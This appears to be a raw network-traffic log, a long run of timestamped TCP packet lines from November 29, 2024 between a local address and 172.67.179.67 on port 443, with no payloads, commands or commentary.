                                                                                                            Nov 29, 2024 09:10:30.764331102 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.764384031 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.764522076 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.765649080 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.765729904 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.765881062 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.765933990 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.765953064 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.766779900 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.766849041 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.767009974 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.767009974 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.767062902 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.767086029 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.768203020 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.768273115 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.768440962 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.768440962 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.768441916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.768498898 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.768620014 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.769157887 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.769222975 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.769378901 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.769431114 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.769464970 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.769551992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.770539045 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.770612001 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.770767927 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.770767927 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.770823002 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.770847082 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.771771908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.771838903 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.771987915 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.771987915 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.772042036 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.772164106 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.773186922 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.773268938 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.773401976 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.773402929 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.773458958 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.773483992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.773576021 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.774446964 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.774524927 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.774709940 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.774761915 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.774796963 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.774796963 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.775594950 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.775665998 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.775865078 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.775865078 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.775865078 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.775922060 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.776897907 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.776974916 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.777115107 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.777115107 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.777167082 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.777190924 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.777285099 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.777983904 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.778064966 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.778222084 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.778222084 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.778278112 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.778403044 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.779309034 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.779376984 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.779508114 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.779560089 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.779593945 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.779679060 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.780682087 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.780761003 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.780939102 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.780939102 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.780993938 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.781107903 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.781857014 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.781936884 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.782064915 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.782115936 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.782135010 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.782135010 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.782685041 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.782768011 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.782896996 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.782948971 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.782968044 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.783104897 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.784219027 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.784287930 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.784435987 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.784435987 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.784490108 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.784610987 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.785379887 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.785475969 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.785583019 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.785635948 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.785763979 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.786468983 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.786546946 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.786673069 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.786724091 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.786742926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.786905050 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.787396908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.787468910 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.787631035 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.787681103 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.787714005 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.788955927 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.789006948 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.789141893 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.789172888 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.789243937 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.789243937 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.789757013 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.789800882 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.789911985 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.789932966 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.790031910 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.790031910 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.790826082 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.790877104 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.791016102 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.791050911 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.791050911 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.791050911 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.791073084 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.791160107 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.792299032 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.792352915 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.792510033 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.792541981 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.792614937 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.793452024 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.793495893 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.793638945 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.793672085 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.793740034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.793818951 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.794470072 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.794514894 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.794661045 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.794780970 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.794811964 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.795420885 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.795469046 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.795608997 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.795641899 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.795717955 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.796977997 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.797020912 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.797157049 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.797189951 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.797249079 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.797363043 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.798614025 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.798664093 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.798810005 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.798844099 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.798844099 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.798861980 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.798938990 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.799241066 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.799294949 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.799426079 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.799457073 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.799516916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.799516916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.800676107 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.800724983 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.800862074 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.800894976 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.800925016 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.800925016 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.801883936 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.801938057 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.802103043 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.802134037 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.802203894 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.802797079 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.802844048 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.802995920 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.803026915 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.803049088 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.803157091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.804579020 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.804635048 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.804780960 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.804812908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.804886103 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.805419922 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.805473089 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.805613995 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.805646896 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.805712938 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.805712938 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.806320906 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.806385040 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.806566000 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.806597948 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.806617975 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.806617975 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.807431936 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.807477951 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.807621956 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.807655096 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.807792902 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.808569908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.808628082 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.808749914 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.808782101 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.808919907 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.809637070 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.809725046 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.809839964 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.809890985 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.809909105 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.810070992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.810910940 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.810986042 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.811106920 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.811106920 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.811106920 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.811157942 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.811183929 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.811295986 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.811886072 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.811964035 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.812098980 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.812150002 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.812167883 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.812259912 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.812922001 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.812992096 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.813468933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.813468933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.813532114 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.814116955 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.814203978 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.814333916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.814385891 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.814517021 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.815082073 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.815151930 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.815279007 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.815332890 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.815351009 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.815485954 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.816262007 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.816339970 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.816469908 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.816520929 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.816648960 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.817370892 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.817465067 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.817578077 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.817631006 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.817648888 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.817778111 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.818511009 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.818598032 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.818726063 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.818777084 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.818907976 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.819592953 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.819665909 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.819807053 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.819858074 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.819890022 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.820471048 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.820549011 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.820672989 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.820724964 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.820843935 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.828706980 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.828778982 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.828939915 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.828939915 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.828939915 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.828999043 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.829024076 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.829125881 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.829217911 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.829293966 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.829427004 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.829427004 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.829483032 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.829607964 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.829718113 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.829788923 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.829929113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.829929113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.829982996 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.830005884 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.830108881 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.830249071 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.830327988 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.830472946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.830472946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.830528021 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.830552101 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.830647945 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.830776930 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.830852032 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.830991030 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.830991030 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.831043959 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.831069946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.831161976 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.831302881 CET44349761172.67.179.67192.168.11.30
